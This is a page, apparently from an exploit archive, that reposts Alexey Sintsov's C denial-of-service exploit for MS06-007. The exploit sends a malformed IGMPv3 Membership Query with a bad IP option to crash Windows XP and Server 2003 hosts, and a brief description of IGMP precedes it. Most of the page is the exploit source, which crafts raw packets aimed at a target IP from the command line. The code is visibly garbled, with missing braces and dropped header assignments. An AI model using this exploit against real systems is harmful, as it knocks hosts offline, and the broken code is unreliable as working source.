‘IGMP v3 DoS (MS06-007, Exploit)’


‘The Internet Group Management Protocol (IGMP) is a communications protocol used to manage the membership of Internet Protocol multicast groups. IGMP is used by IP hosts and adjacent multicast routers to establish multicast group memberships. It is an integral part of the IP multicast specification, like ICMP for unicast connections.

A specially crafted IGMP packet sent to a vulnerable system could create a denial of service situation and cause the system to stop responding.’


‘The original article can be found at:
Related articles:
TCP/IP IGMP DoS (MS06-007)


        IGMP v3 DoS Exploit

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
        ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

        by Alexey Sintsov (dookie@inbox.ru)

                Administrator rights on system
                Windows Firewall off (for sending RAW packets)

        Affected Products:
                Microsoft Corporation Windows XP All
                Microsoft Corporation Windows Server 2003 All

#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, ‘Ws2_32.lib’)

typedef struct iphdr
        unsigned char verlen; // IP version & length
        unsigned char tos; // Type of service
        unsigned short total_len; // Total length of the packet
        unsigned short ident; // Unique identifier
        unsigned short frag_and_flags; // Flags
        unsigned char ttl; // Time to live
        unsigned char proto; // Protocol (TCP, UDP etc)
        unsigned short checksum; // IP checksum
        unsigned int sourceIP; // Source IP
        unsigned int destIP; // Destination IP
        unsigned short options[2];


typedef struct igmphdr {
          unsigned char type;
          unsigned char code;
                  unsigned short checksum;
                  unsigned long group;
                  unsigned char ResvSQVR;
                  unsigned char QQIC;
                  unsigned short num;
                  unsigned long addes;


USHORT checksum(USHORT *buffer, int size)
    unsigned long cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size -= sizeof(USHORT);

    if (size)
        cksum += *(UCHAR*)buffer;

    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);

int sendIGMP(char* a, char* b)
        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;
        IGMPHEADER igmpHeader;
        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);

        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        SOCKET sock;
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf(‘Create socket error’);
                return FALSE;

        BOOL flag=TRUE;
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
                printf(‘Set options error’);
                return FALSE;

        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));

        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));







        //Ip options
        ipHeader.options[0]=htons(0x0000); //bug is here =)

        igmpHeader.type=0x11; //v3 Membership Query


        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf(‘Send error: <%d>n’,WSAGetLastError());
                return 0;


        return 1;

main(int argc, char **argv)
                printf(‘nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)nn’);
                printf(‘c:\igmps.exe <target ip> <source ip>nn’);

        sendIGMP(argv[2], argv[1]);
        return 0;

Categories: Exploits